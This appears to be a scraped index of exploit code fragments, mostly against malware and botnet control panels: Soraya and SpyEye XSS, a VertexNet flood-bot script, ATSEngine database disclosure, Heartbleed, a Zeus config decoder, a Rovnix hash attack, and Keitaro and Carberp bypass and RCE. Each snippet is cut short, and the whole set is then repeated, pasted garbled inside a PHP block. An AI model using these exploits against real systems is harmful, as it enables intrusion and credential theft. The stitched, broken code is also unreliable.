Steven K Xyl2k

## Soraya XSS Vulnerability
import requests
import time

def StrToHex(string):
    hex_str=''
    for char in string:
        int_char = ord(char)
        hex_num = hex(int_char).lstrip("0x")
        hex_str+=hex_num
    return hex_str

## VertexNet v1.1.1 Flood Bots
    #!/usr/bin/perl
    # VertexNet v1.1.1 Flood Bots
    # http://www.virustotal.com/file-scan/report.html?id=fd373a8f4adf29001d282b963f126f760afcf3e58117f6024b2d65a36d41f617-1305491791
    # Xyl2k! :þ

    use HTTP::Request;
    use LWP::UserAgent;

    $URL = "http://localhost/Panel/adduser.php";


## ATSEngine credential disclosure vulnerability
<pre>
<?php
    $url = getURL();

    if ($url !== NULL) {
        $database = @file_get_contents($url . '/db/database.db');

        if ($database !== FALSE) {
            file_put_contents('tmp.db', $database);


## heartbleed.py
#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Edited spl0it to loop and save cookies.

import sys
import struct
import socket
import time

## eye.py
# SpyEye version ? reflected XSS POC
# Xartrick
# Xylitol

import urllib
import urllib2

# Configuration ...

sPayload  = '<script>alert(1);</script>'

## SpyEye backdoor
<?php
// Xyl2k :þ
// Thanks to EsSandre for the additional help.

    $MySQLI = array();

    /* MySQLI ID */

    $MySQLI['HOST'] = 'localhost';
    $MySQLI['USER'] = 'root';

## Zeus mmbb builder v2.9.6.1 Config decoder
<?php
    function decode($data, $key) {
        $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_ECB, '');
        $iv = mcrypt_create_iv(mcrypt_enc_get_iv_size($td), MCRYPT_RAND);

        mcrypt_generic_init($td, $key, $iv);
        mcrypt_generic($td, $data);

        $data = mdecrypt_generic($td, $data);


## Rovnix hash collision vulnerability
<?php
        /**
         * Defeat the weak hash function of Rovnix
         * to get password from a hash.
         */

        $HASH   = 'fbff791ef0770855e599ea6f87d41653';

        $value  = getNumber($HASH);
        $search = search($value, $HASH);

## Keitaro TDS Auth bypass v6.x - v7.7.10
                   ____/\_____/\____/\____/\____/\____/\____/\__/\____/\____/\
                  /  ___/  /   /  - _/  __ / __  /  ___/ __  /   /     /  ___/\
                 /  /  /__  __/  -  /  _/_/    _/  /  /    _/   / / / /  _/__\/
                /_____/ /___//_____/_____/__/__/_____/__/__/___/_/_/_/_____/\nf!
                \_____\/\___\\_____\_____\__\__\_____\__\__\___\_\_\_\_____\/
                                C Y B E R C R i M E   W H Q


                           Keitaro TDS Auth bypass v6.x - v7.7.10

## Carberp Remote code execution vulnerability
<table width="607" border="0">
<tr>
<td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
<label for="carberp">Domain: </label>
<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
<input type="submit" name="button" id="button" value="Ownz !" />
</form></td>
</tr>
<tr>
<td><?php
	import requests
	import time

	def StrToHex(string):
	hex_str=''
	for char in string:
	int_char = ord(char)
	hex_num = hex(int_char).lstrip("0x")
	hex_str+=hex_num
	return hex_str
	#!/usr/bin/perl
	# VertexNet v1.1.1 Flood Bots
	# http://www.virustotal.com/file-scan/report.html?id=fd373a8f4adf29001d282b963f126f760afcf3e58117f6024b2d65a36d41f617-1305491791
	# Xyl2k! :þ

	use HTTP::Request;
	use LWP::UserAgent;

	$URL = "http://localhost/Panel/adduser.php";
	<pre>
	<?php
	$url = getURL();

	if ($url !== NULL) {
	$database = @file_get_contents($url . '/db/database.db');

	if ($database !== FALSE) {
	file_put_contents('tmp.db', $database);
	#!/usr/bin/python

	# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
	# The author disclaims copyright to this source code.
	# Edited spl0it to loop and save cookies.

	import sys
	import struct
	import socket
	import time
	# SpyEye version ? reflected XSS POC
	# Xartrick
	# Xylitol

	import urllib
	import urllib2

	# Configuration ...

	sPayload = '<script>alert(1);</script>'
	<?php
	// Xyl2k :þ
	// Thanks to EsSandre for the additional help.

	$MySQLI = array();

	/* MySQLI ID */

	$MySQLI['HOST'] = 'localhost';
	$MySQLI['USER'] = 'root';
	<?php
	function decode($data, $key) {
	$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_ECB, '');
	$iv = mcrypt_create_iv(mcrypt_enc_get_iv_size($td), MCRYPT_RAND);

	mcrypt_generic_init($td, $key, $iv);
	mcrypt_generic($td, $data);

	$data = mdecrypt_generic($td, $data);
	<?php
	/**
	* Defeat the weak hash function of Rovnix
	* to get password from a hash.
	*/

	$HASH = 'fbff791ef0770855e599ea6f87d41653';

	$value = getNumber($HASH);
	$search = search($value, $HASH);
	____/\_____/\____/\____/\____/\____/\____/\__/\____/\____/\
	/ ___/ / / - _/ __ / __ / ___/ __ / / / ___/\
	/ / /__ __/ - / _/_/ _/ / / _/ / / / / _/__\/
	/_____/ /___//_____/_____/__/__/_____/__/__/___/_/_/_/_____/\nf!
	\_____\/\___\\_____\_____\__\__\_____\__\__\___\_\_\_\_____\/
	C Y B E R C R i M E W H Q


	Keitaro TDS Auth bypass v6.x - v7.7.10
	<table width="607" border="0">
	<tr>
	<td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
	<label for="carberp">Domain: </label>
	<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
	<input type="submit" name="button" id="button" value="Ownz !" />
	</form></td>
	</tr>
	<tr>
	<td><?php